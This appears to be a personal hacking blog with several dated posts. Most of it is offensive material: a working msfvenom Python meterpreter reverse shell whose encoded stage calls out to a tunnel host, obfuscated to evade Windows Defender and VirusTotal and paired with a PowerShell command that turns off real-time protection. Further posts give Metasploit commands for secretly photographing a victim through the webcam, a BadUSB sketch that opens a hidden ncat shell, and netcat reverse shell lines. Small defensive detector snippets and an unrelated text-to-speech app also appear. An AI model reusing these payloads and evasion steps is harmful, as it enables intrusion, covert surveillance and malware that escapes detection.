Friday, August 19, 2022

Avoiding Anti Virus Detection By Creating Payloads Msfvenom for Python

This is a secret that I have to share with the public for educational purposes and for antivirus companies to take into consideration. All of my reverse shell experiments required me to disable my firewall and antivirus so that they would yield results, because they were merely meant to prove that the software and methods work, and so far I have succeeded, but I realized that this is still incomplete. I mentioned in my previous post that a crypter like Shellter may be used to avoid antivirus detection, so I tried it, but the encrypted payload was detected by Windows Defender because Shellter is no longer being updated by its creators. I have not tried Veil as a crypter, but from my endless research it is in the same situation as Shellter. I wanted to do something better to avoid antivirus detection. The crypter I tried failed, so I decided to use an obfuscation method, and I am happy to announce that the latest update of Windows Defender was not able to detect the payload I created with msfvenom (after I tweaked it a little bit). This was my own experiment only.

Windows Defender looks for hashes inside a file that match its database of known threats, so what if I could get at those hashes, modify them a little bit, and only restore them at runtime? So I researched whether the msfvenom payload can be output as a Python script, and it really can, by issuing the following command:

msfvenom -p python/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f raw -o payload.py


It created the following python script:

exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')(aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ2I3YzdmNTU0ODExMGU3LmxocnR1bm5lbC5saW5rJyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKHpsaWIuZGVjb21wcmVzcyhiYXNlNjQuYjY0ZGVjb2RlKGQpKSx7J3MnOnN9KQo=)[0]))

This is a complete Python script and can already be executed. The payload is the long base64-encoded string (which is where I suspect the hash is located). So I used PyInstaller to convert it to an executable file by typing the following:

pyinstaller --noconsole --onefile payload.py --nowindowed

Then I uploaded it to Google Drive. I could not send it via email (Yahoo and Gmail) because they detect it as a harmful file, and these email services do not allow .exe attachments even if the file has no virus. I also tried Facebook Messenger and it did not allow the file to be sent either, because it detected malicious content. I tried changing the extension from .exe to .zip and sending it through Facebook Messenger, and I was surprised that it succeeded. But this is very impractical, because you cannot instruct your friend to change it back to .exe; it will still be detected by Windows Defender after the conversion. So I succeeded in uploading the file to my Google Drive. I tried to download it to my other PC, but that was when Google detected that it was a virus. It still gave me the option to download it or not, so of course I continued downloading the file, but when it reached 90%, Windows Defender stopped the download because it was a virus.

So basically I could not download the payload. 

As stated in the second paragraph, I needed to tweak the Python script. I took out the encoded string and assigned it to a variable. I made a small change to the encoded string by inserting several spaces at random. The second command removes the spaces. Then I compiled it using PyInstaller, uploaded it to Google Drive, downloaded it, and succeeded in downloading the payload without it being detected by Windows Defender or Google.

Here is the complete python script:

import subprocess
def run(self, cmd):
    completed = subprocess.run(["powershell", "-Command", cmd], capture_output=True)
    return completed

if __name__ == '__main__':
    hello_command = "Set-MpPreference -DisableRealtimeMonitoring $true"
    #hello_info = run(hello_command)
    subprocess.run(["powershell", "-Command", hello_command], capture_output=True)	
codel = ' aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbi ByYW5nZSgxMCk6Cgl0cnk6CgkJ cz1zb2NrZXQuc29ja2V0KDIsc2 9ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ2I3Yz dmNTU0ODExMGU3LmxocnR1b m5lbC5saW5rJyw0NDMpKQoJCWJyZWFrCglleGNl cHQ6CgkJdGltZS5zbGVlcCg1KQpsPX N0cnVjdC51bnBhY2soJz5JJyxzLnJlY3 YoNCkpWzBdCmQ9cy5yZWN2K GwpCndoaWxlIGxlbihkKTxsOgoJ ZCs9cy5yZWN2KGwtbGVuKGQpKQ pleGVjKHpsaWIuZGVjb21wcmVzcy hiYXNlNjQuYjY0ZGVjb2RlKGQp KSx7J3MnOnN9KQo='

codel.replace(" ","") 
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')(codel)[0]))    

As an added bonus, I added a feature that disables Windows Defender real-time protection before executing the payload. I was planning to disable the firewall too, but as of this writing I have not implemented it yet because I was too excited to document what I had just achieved.

My experiment so far is based on the antivirus software that came pre-installed on my PC; I think it is bundled with any licensed Windows OS. As part of my testing phase, I uploaded the Python script to virustotal.com to test whether other antivirus products could detect it. AVG and Avast were able to detect it. I thought the spaces I had added were not enough, so I added some more spaces and uploaded it again to virustotal.com, and finally it came out as virus free.
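
The space trick works because base64.b64decode() discards characters outside the base64 alphabet by default, so a scanner that matches on the raw bytes of the literal misses it while the loader still runs (the .replace() line is not even needed). Added example, not code from this post: a small Python scanner that normalizes quoted base64 literals the same way before looking inside them and also flags the Defender-tampering command; the token list is a constructed illustration rather than a vendor signature set, and the sample script it scans is constructed and inert.

```python
import base64
import binascii
import re
from typing import Optional

# A quoted base64 literal that may have whitespace sprinkled inside it, like the
# codel string above. Requiring the quotes keeps ordinary prose from matching.
_QUOTED_B64 = re.compile(r"""(["'])\s*((?:[A-Za-z0-9+/=]\s*){40,})\1""")
# Tokens a reviewer expects in a staged loader (constructed list, not a vendor signature set).
SUSPICIOUS_TOKENS = (b"socket.socket", b"exec(", b"zlib.decompress")


def normalize_b64(literal: str) -> Optional[bytes]:
    """Drop everything outside the base64 alphabet, then decode strictly.

    b64decode() silently skips stray characters by default, which is why the loader
    runs unchanged; a scanner has to normalize the same way before comparing anything.
    """
    cleaned = re.sub(r"[^A-Za-z0-9+/=]", "", literal)
    try:
        return base64.b64decode(cleaned, validate=True)
    except (binascii.Error, ValueError):
        return None


def scan_script(source: str) -> list:
    """Return human-readable findings for one Python source file."""
    findings = []
    if re.search(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", source):
        findings.append("disables Defender real-time monitoring")
    for _quote, literal in _QUOTED_B64.findall(source):
        if re.search(r"\s", literal):
            findings.append("whitespace-obfuscated base64 literal")
        decoded = normalize_b64(literal)
        for token in SUSPICIOUS_TOKENS:
            if decoded is not None and token in decoded:
                findings.append(f"decoded stage contains {token.decode()}")
    return findings


# Constructed, inert stage used only to exercise the scanner: it decompresses nothing.
SAMPLE_STAGE = b"import socket,zlib\nexec(zlib.decompress(b''))\n"


def build_sample(stage: bytes = SAMPLE_STAGE, gap: int = 7) -> str:
    """Constructed input shaped like the loader above, with a space every `gap` characters."""
    b64 = base64.b64encode(stage).decode()
    spaced = " ".join(b64[i:i + gap] for i in range(0, len(b64), gap))
    return ('subprocess.run(["powershell", "-Command", '
            '"Set-MpPreference -DisableRealtimeMonitoring $true"])\n'
            f"codel = '{spaced}'\n"
            "exec(__import__('base64').b64decode(codel))\n")
```

Running scan_script(build_sample()) reports the tampering command, the spaced literal, and the exec/zlib tokens found after normalization.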

To be continued...

Thursday, August 11, 2022

Taking a Photo from a Webcam of a Hacked Windows 10 PC

As I mentioned in my previous post (Setting-up a Lab for Metasploit), I was experimenting with whether I could open the webcam of a hacked Windows PC. In this article, as the title suggests, I will just take a photo from the hacked machine and save it to a local directory, which is not far from the original objective of my experiment. I think it is also possible to view the live stream from the webcam, which I may explore in the near future, but for now I will just take a photo.

Here's how I was able to do it:

1. The initial step is basically to set up the infrastructure needed for this experiment, which I thoroughly documented in my previous post. I encountered several fuzzy problems along the way. The first time I did the procedure everything worked just fine, but I had to stop to attend to other tasks, and when I repeated the process a few days later, sometimes the target machine and my VirtualBox Kali would not see each other on the network. After a ridiculous amount of trial and error, just restarting, deleting the bridge network adapter and bringing it up again, maybe around 10 times, they could finally see each other.

2. The next thing I did was create the payload, which is a .exe file, using msfvenom by typing the following in the terminal emulator:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=<IP Address> LPORT=<Port Number> -o name.exe

This payload will be uploaded to the target Windows 10 PC. In my case, I had to save it to a microSD card from my host machine and then insert it into my target machine. This .exe file is a virus, so I had to disable my firewall and antivirus. There are techniques to hide it and avoid virus detection; one method is to use Shellter. I was not able to perform this step because I could not download it. What this .exe file mainly does is open a reverse shell once the user of the target machine executes it.

3. I have to run Metasploit to listen on the port by typing the following:

msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <IP Address>
set LPORT <Port Number>
run

4. Once the reverse shell was connected, I typed the following to take a photo from the target machine's webcam and save it locally:

webcam_list - returns the attached webcams on the target machine
webcam_snap -i 1 -v false - takes a photo in jpeg format and saves it to a local directory

And that was it. I was supposed to take a screenshot of each step, but as I was writing this post my Kali crashed, too sad. But it does not really matter; this post serves as documentation of my experiment.

Tuesday, August 9, 2022

USB as an Attack Vector in Cyber Security

USB thumb drives can be used by hackers to attack their target machines. The common term for such a device is Rubber Ducky or BadUSB. A few companies sell this kind of device, with prices ranging from 2000 to 6000 pesos. There are several ways to accomplish this, and the simplest is to use an Arduino. There are many variants of Arduino, from small to ultra small like the Femtoduino (the smallest Arduino, I think). To use this device, hackers usually insert it into their target machine's USB port when no one else is watching, and it only takes less than 10 seconds, or sometimes 3 seconds.

The Arduino can be programmed to mimic a keyboard, which means that once it is inserted into a USB port, the computer recognizes it as a keyboard. And as we all know, Windows machines fully trust keyboards, so it is allowed to run without restriction. To prove this, I experimented with an ordinary USB memory stick by following a guide I found on YouTube, but even though I had turned off my antivirus, Windows did not trust it. So I did a little experiment to see whether what all those people on YouTube were saying was true and immediately ordered the cheapest Arduino on Shopee (Attiny185, costing only 101 pesos plus 60 pesos delivery charge). When it arrived, I uploaded the following program (they call it a sketch in the Arduino world). As its price suggests, the bad USB I used for my experiment is not as sophisticated as those being sold as bad USB on the market.

#include "DigiKeyboard.h"
#define KEY_DOWN 0x51 // Keyboard Down Arrow
#define KEY_ENTER 0x28 //Return/Enter Key

void setup() {
  pinMode(1, OUTPUT); //LED on Model A 
}

void loop() {
   
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000);
 
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run
  DigiKeyboard.delay(100);
  
  DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible
  DigiKeyboard.delay(500);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_ALT_LEFT); //Menu  
  DigiKeyboard.sendKeyStroke(KEY_M); //goto Move
  for(int i =0; i < 100; i++)
    {
      DigiKeyboard.sendKeyStroke(KEY_DOWN);
    }
  DigiKeyboard.sendKeyStroke(KEY_ENTER); //Detach from scrolling
  DigiKeyboard.delay(100);
  DigiKeyboard.println("ncat -lp 768 -vv -e cmd.exe");
  DigiKeyboard.delay(90000);
  digitalWrite(1, LOW); 
  DigiKeyboard.delay(5000);
  

This program opens a command prompt window and drags it downward so that other people will not see it, then creates a reverse shell on port 768 when it is inserted into a Windows machine.

And on my pc, I will just type "ncat <ip> 768".

My experiment was successful.

You may find the original program on GitHub; I got the idea from YouTube. The original program was meant to steal Wi-Fi passwords and send them to the internet (a webhook site). But it would take around 30 seconds to accomplish its task and may not work on other Windows PCs (it does not work on my Gole Mini PC), while the program I uploaded takes less than 10 seconds and will surely work if netcat is installed on that PC. If netcat is not installed but Python is, a Python program that creates a reverse shell can be used instead.

This is just for educational purposes only. You could go to jail if you use this to actually steal something or do something illegal. It is one of the tools used by hackers but also by ethical hackers and penetration testers.
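
The sketch above types its command with DigiKeyboard.println(), so the characters arrive far faster than a person can type, and they arrive right after a Win+R. Added example from the defender's side (not code from this post): a Python detector that splits a keystroke log into bursts by inter-key gap and reports machine-speed bursts that follow a Run-dialog shortcut; the log is constructed, and the 30 ms human-typing threshold and 2 s Run-dialog window are assumptions, not measured values.

```python
from dataclasses import dataclass
from statistics import median


@dataclass(frozen=True)
class KeyEvent:
    t_ms: int   # timestamp in milliseconds
    key: str    # one character, or a name such as "Enter" or "GUI+r"


# Assumed thresholds, not measured values: a person rarely sustains under 30 ms
# between keys, while DigiKeyboard.println() emits characters with no delay at all.
MACHINE_GAP_MS = 30
MIN_BURST_KEYS = 10
RUN_DIALOG_WINDOW_MS = 2000


def render(events):
    """Turn a key sequence back into the text it would have typed."""
    return "".join(e.key if len(e.key) == 1 else f"<{e.key}>" for e in events)


def find_injection_bursts(events, max_gap=MACHINE_GAP_MS, min_keys=MIN_BURST_KEYS):
    """Split the log wherever the inter-key gap exceeds max_gap and report the
    machine-speed runs long enough to hold a command."""
    bursts = []
    start = 0
    for i in range(1, len(events) + 1):
        if i == len(events) or events[i].t_ms - events[i - 1].t_ms > max_gap:
            if i - start >= min_keys:
                burst = events[start:i]
                gaps = [b.t_ms - a.t_ms for a, b in zip(burst, burst[1:])]
                # Was the Run dialog opened shortly before the burst, as the sketch does?
                opened_run = any(e.key == "GUI+r" and
                                 burst[0].t_ms - e.t_ms <= RUN_DIALOG_WINDOW_MS
                                 for e in events[:start])
                bursts.append({"text": render(burst),
                               "median_gap_ms": median(gaps),
                               "after_run_dialog": opened_run})
            start = i
    return bursts


def constructed_log():
    """Constructed sample: a person types 'hello', then an injected device
    opens Run and replays the sketch's first command line at 2 ms per key."""
    events = [KeyEvent(150 * i, c) for i, c in enumerate("hello")]
    events.append(KeyEvent(5000, "GUI+r"))
    cmd = "cmd /k mode con: cols=15 lines=1"
    events += [KeyEvent(5100 + 2 * i, c) for i, c in enumerate(cmd)]
    events.append(KeyEvent(5100 + 2 * len(cmd), "Enter"))
    return events
```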


Saturday, August 6, 2022

PyQt6: A simple Text-to-Speech app

This demo program shows how to use the pyttsx3 library to turn text into audio.

The Output:



The Code:

 

import sys
import pyttsx3

from PyQt6.QtGui import *
from PyQt6.QtCore import *
from PyQt6.QtWidgets import *


class SpeechRunnable(QRunnable):
    def __init__(self):
        QRunnable.__init__(self)
        # QThreadPool deletes a QRunnable after it has run unless told otherwise;
        # keeping it alive lets the start button be clicked more than once.
        self.setAutoDelete(False)
        self.engine = None
        self.chat_speech = ''

    def run(self):
        # the pyttsx3 engine is created on the worker thread that uses it
        self.engine = pyttsx3.init()
        self.engine.setProperty('rate', 150)
        self.engine.setProperty('volume', 1)
        self.engine.say(self.chat_speech)
        self.engine.runAndWait()

    def say(self, text):
        if text != '':
            self.chat_speech = text
            QThreadPool.globalInstance().start(self)

    def stop(self):
        # no engine exists until run() has been called at least once
        if self.engine is not None:
            self.engine.stop()


class Window(QWidget):
    def __init__(self):
        super(Window, self).__init__()
        self.runnable = None

        self.le = QTextEdit(self)
        self.le.setPlainText('Type the text to be spoken here.')
        self.le.setGeometry(5, 40, 890, 450)
        self.btnStart = QPushButton("start", self)
        self.btnStart.setGeometry(5, 5, 100, 30)
        self.btnStop = QPushButton("stop", self)
        self.btnStop.setGeometry(110, 5, 100, 30)
        self.btnStart.clicked.connect(self.onClickedStart)
        self.runnable = SpeechRunnable()
        self.btnStop.clicked.connect(self.runnable.stop)
        self.setGeometry(25, 45, 900, 500)
        self.setWindowTitle('Speak')

    def onClickedStart(self):
        otext = self.le.toPlainText()
        self.runnable.say(otext)

    def closeEvent(self, event):
        if self.runnable is not None:
            self.runnable.stop()
            QThread.msleep(100)  # give the worker a moment to wind down
        super(Window, self).closeEvent(event)


if __name__ == '__main__':
    app = QApplication(sys.argv)
    window = Window()
    window.show()
    sys.exit(app.exec())

Thursday, August 4, 2022

Setting-up a Lab for Metasploit

Due to lack of equipment and being on a very low budget, setting up a lab for penetration testing can be a challenge, and this is what I have just encountered. I am used to this kind of stuff, but as I progress I am learning new things and want to document it each time I solve a challenge (I keep challenging myself in order to learn new things).

My goal is to set up a lab in which I can view the webcam of the target machine. My target machine is a Windows 10 PC and I will attack it from my VirtualBox Kali Linux. I am still at the first stage, where I have to set up my equipment. So I browsed the web for tutorials, and on the side I learned that what I am trying to accomplish is not new: in 2014 a hacker used this idea and his victim was Miss Teen USA 2013, but eventually he was caught and sentenced to life imprisonment. May I also add that the Netflix documentary about Snowden had a similar scene. The NSA can open a webcam anywhere in the world; that's what he is trying to tell the world.

This is just a personal challenge; it's not new, and probably all antiviruses will detect it. So the first thing I did was disable my antivirus and firewall. The next step was a real challenge for me, because my Kali Linux must be on the same network as my target machine. I had previously succeeded in establishing a reverse shell where the target machine was my Kali Linux running on VirtualBox and the attacking machine was my Windows 10 PC, which is the opposite. This kept me busy the whole day.

These are the steps I did:

I created a bridged network linking my Wi-Fi network connection and Ethernet 2 (VirtualBox Host-only Ethernet Adapter). To do this, select the two network adapters, right click, then select "bridged network" from the context menu, and that's it.


 

Then in my Kali Linux network settings, I changed it to Host-Only Adapter and selected the VirtualBox Host-only Ethernet Adapter from the drop-down.


 

On my Kali Linux, I had to reconfigure eth0 by modifying /etc/network/interfaces with vim, adding the following:

auto eth0
iface eth0 inet static
address 192.168.24.72/24
netmask 255.255.255.0
gateway 192.168.24.24

The next thing I did was stop and start my eth0 interface by issuing the following commands:

sudo ifdown eth0
sudo ifup eth0

To initially test whether the configuration was correct, I checked the current IP address of my Kali Linux by typing "ifconfig" and confirmed that the IP address is 192.168.24.72, indicating that it is on the same network as my target machine.


 

It can only be truly confirmed by establishing a reverse shell: I typed "ncat -nv 192.168.24.71 9090 -e cmd.exe" on the target side, and on my Kali Linux I typed "nc -lvp 9090", and a reverse shell was created.